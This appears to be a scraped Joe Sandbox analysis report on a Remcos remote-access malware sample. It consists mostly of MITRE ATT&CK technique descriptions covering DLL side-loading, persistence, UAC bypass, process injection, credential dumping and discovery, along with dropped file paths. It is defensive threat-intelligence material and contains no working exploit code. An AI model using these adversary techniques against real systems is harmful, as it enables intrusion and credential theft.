Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bwYw3UUfy7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json

C:\Users\user\AppData\Local\Temp\aut2C95.tmp

C:\Users\user\AppData\Local\Temp\aut38BB.tmp

C:\Users\user\AppData\Local\Temp\aut7612.tmp

Windows Analysis Report
bwYw3UUfy7.exe

Function 007342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00733170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
timewindowregistryCOMMON

Function 007342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0079DBBE Relevance: 6.0, APIs: 4, Instructions: 29
filestringCOMMON

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre